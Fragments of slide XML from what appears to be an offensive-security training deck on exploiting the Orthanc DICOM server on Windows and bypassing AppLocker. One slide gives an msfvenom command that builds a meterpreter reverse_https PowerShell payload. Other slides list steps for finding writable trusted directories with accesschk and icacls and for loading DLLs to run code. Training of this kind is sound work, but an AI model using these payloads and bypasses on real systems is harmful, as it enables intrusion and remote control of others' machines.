            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>External To the Device (Net) – the Beginning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1711C06A-9E42-CAE2-5EBC-CBA72CC342E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful Software Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireshark - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.wireshark.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TCPdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.tcpdump.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ettercap (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MiTM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.ettercap-project.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/burp/communitydownload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful Hardware Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lan Tap - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://shop.hak5.org/products/throwing-star-lan-tap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switch with Port Mirroring </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crossover Cable (occasionally this has been phased out)</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96438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90B9-80B6-5DE0-A3E0-C86DD8E7E6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Windows RCE - Weaponization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78B9AB9-5C8C-D773-A196-ED648758ADC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create your Windows payload using the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSFvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=HOST LPORT=PORT EXITFUNC=thread -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-net &gt; test.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2471250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ECFC6-F7AD-894B-0E05-652AEE7B0311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="325369"/>
            <a:ext cx="4368602" cy="1956841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Orthanc Windows RCE - Weaponization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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28077845-5070-0B56-C238-E50C454E5070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2872899"/>
            <a:ext cx="4243589" cy="3320668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Now, re-run your exploit and GO AND GAIN YOUR SHELL!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>If you DIDN’T GET a shell or get caught up at any point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>lemme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> know and we will fix this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="r/Mario - So... how exactly does bowser look without his shell?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28EEB2E-AFAF-01F5-B4BB-1B9B8CE5E3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087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057F-D1CC-04CA-0FAE-10C91B5C2EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bypasses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5404FB4F-28D2-5B87-0C44-3101428E6349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The default rules for AppLocker include whitelisting for executables in C:\Program Files, C:\Program Files(x86) and Windows Directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This is logical as it is assumed non-admins cannot write files or scripts here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Download: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Accesschk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://live.sysinternals.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>X86 for x86 Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>X64 for 64 bit systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133963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9208-8F13-FA29-011C-9E4386404594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXERCISE – Check MY Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272ACE6D-3775-1BBC-CD49-1E556DF11D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Accesschk.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, executed from an Admin prompt on a system emulating the same constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Accesscheck.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>YOURUSER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" C:\Windows -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use -w to locate writeable directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use -u to suppress errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use -s to recurse through all subdirectories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now do the same for the ORTHANC related directories</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="19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900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Once a directory with READ/Write (RW) is located, we can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>icacls.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to check for execution writes within the directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Icacls.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> C:\Windows\Tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 BUILTIN\Administrators:(F)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 BUILTIN\Administrators:(OI)(CI)(IO)(F)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 NT AUTHORITY\SYSTEM:(F)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 CREATOR OWNER:(OI)(CI)(IO)(F)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Successfully processed 1 files; Failed processing 0 files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="19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900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As the output shows, authenticated users have the ability to execute from this directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to this directory allows for execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721397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7AB8-4DA9-8764-ABB7-5181CF4AEA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bypasses – DLL’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C2C84C-8D76-BA94-45E1-5BB20FF339C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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The default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rules do not protect against loading arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dlls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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If we create an unmanaged DLL, we can load it and trigger exported APIs to gain code execution</a:t>
            </a:r>
          </a:p>
